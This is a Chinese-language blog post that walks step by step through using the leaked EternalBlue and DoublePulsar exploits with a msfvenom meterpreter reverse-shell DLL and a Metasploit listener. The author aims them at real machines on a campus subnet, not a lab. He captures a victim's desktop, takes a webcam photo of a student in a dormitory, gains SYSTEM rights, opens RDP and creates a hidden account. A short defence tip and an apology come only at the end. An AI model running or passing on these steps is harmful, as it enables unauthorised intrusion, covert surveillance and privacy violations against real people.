准备环境
kalilinux 监听机,或者装有msf和nmap的linux即可,桥接物理机网络
win03 攻击机 python2.6 + pywin32 环境 桥接
exp下载链接 https://github.com/misterch0c/shadowbroker
python-2.6.6.msi https://www.python.org/download/releases/2.6.6/ |
pywin32-221.win32-py2.6.exe https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/ |
靶机:不用本地的靶机,虽然测试成功了,但是要实战才有意思。所以扫本地的C段。
配置攻击机1【win2003】
把下载的exp压缩包中Windows目录解压到攻击机上,不要解压到有中文目录的路径,不然会报错,解压完后,我们在Windows目录下新建一个空目录“listeningposts”,为什么要建立这个目录,因为fb.py中有个遍历目录的参数,对应的就是这个目录,默认是没有的。
利用nmap扫下C段,看有哪些机器开了445端口,主要针对win4 64 的主机进行试验。
nmap -p 445 -O 10.20.70.0/24 扫描整个C段开放445端口的主机,并且探测系统版本。 |
针对目标主机 10.20.70.x
然后运行fb.py脚本,设置参数
攻击目标
[?] Default Target IP Address [] : 10.20.70.x
本机IP
[?] Default Callback IP Address [] : 10.20.88.207
是否重定向
[?] Use Redirection [yes] : no
是否输出日志
[?] Base Log directory [D:\logs] : no
根据提示,新建一个项目,然后默认设置,直到设置
use eternalblue
设置好选择Yes,然后一路回车默认,直到出现选择针对的目标系统和加载的MODE
这里我都选择1,因为我针对的系统是X64的win7,MODE用本身自带的一个fuzz框架。然后一路YES回车,直到出现
输入 use doublepulsar
然后一样默认设置回车yes,直到出现要我们再次设置攻击目标的信息,选择SMB服务,x64系统,利用RunDLL模块。
到这里,配置这个exp已经差不多了,这时候打开kalilinux,利用msf配置一个DLL的后门,因为刚才我的fb.py利用的模块是RUNDLL。
配置攻击机2【kalilinux】
利用msf生成一个x64位的dll后门
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.20.89.101 LPORT=5555 -f dll > s.dll |
然后msfconlse 打开msf
设置参数开启侦听
|
msf > use exploit/multi/handler msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf exploit(handler) > set lhost 10.20.89.101 lhost => 10.20.89.101 msf exploit(handler) > set lport 5555 lport => 5555 msf exploit(handler) > exploit |
设置完kalilinux,把刚才生成的dll后门,放到win03攻击机1的C盘目录下。
然后在攻击机1下设置开始攻击。
这时候,kalilinux下反弹了一个shell回来,成功了,HELP一下,看看这个shell有什么功能
功能挺多,运行一下截图桌面的命令。
screenshot
原来在看爱奇艺
看到拍照功能,试验一下。
webcam_snap
竟然一不小心盲到了女寝的C段,学校的wif IP是随机分配的,好吧,我不是有意的,因为隐私问题固打码,看样子妹子也是一脸懵逼,估计摄像头的灯亮了下。:P
运行shell,获取一个system的权限,利用命令开3389,并且创建隐藏账户
功能还有很多,可以利用system权限远程下载一个远控等等,自己挖掘,这里就不继续演示了。排版可能有问题,凑合看吧!
总结
这个漏洞基本是通杀的,真的非常可怕,分析了下源码发现全是自带的库,无奈编程太菜,看了下网上的分析,发现这个漏洞也是基于堆栈的底层溢出,底层的东西我相信还有更多的漏洞没被挖掘出来,无法想象真正的黑客组织手里的0day有多可怕,也让我看到了差距有多大。
两个字总结:震撼!
注:图片本人已经删除了,虽然打了马赛克,但是对于别人造成的影响还是有的,如果在上面的文章中对其事件人物造成了影响,在这里说声抱歉,敬以歉意。
虽然是实战但是涉及到一些隐私问题,一张打了马赛克的照片,和关了爱奇艺,其他本人保证绝对没有做!希望其他论坛和网站转载了本篇文章的朋友请删除相应的内容,再次申明,其他论坛转载文章发生的法律关系与本人无任何关系!
我写这篇文章的目的不是为了教大家怎么去入侵,虽然标题有点扎眼:)
只是希望在安全问题这个方面,引起大家的重视。
对于这个漏洞的防御方法,我的建议是开启防火墙,做一个tcp连接的入站规则阻止,或者直接卸载掉445端口,
参考文章:http://www.jb51.net/hack/95788.html
http://mp.weixin.qq.com/s?__biz=MzIyNTA1NzAxOA==&mid=502990295&idx=1&sn=181c1e9b01854b87d3d4752c593c4dd4&chksm=700a2442477da
原文地址:http://fjhack.me/2017/04/16/08/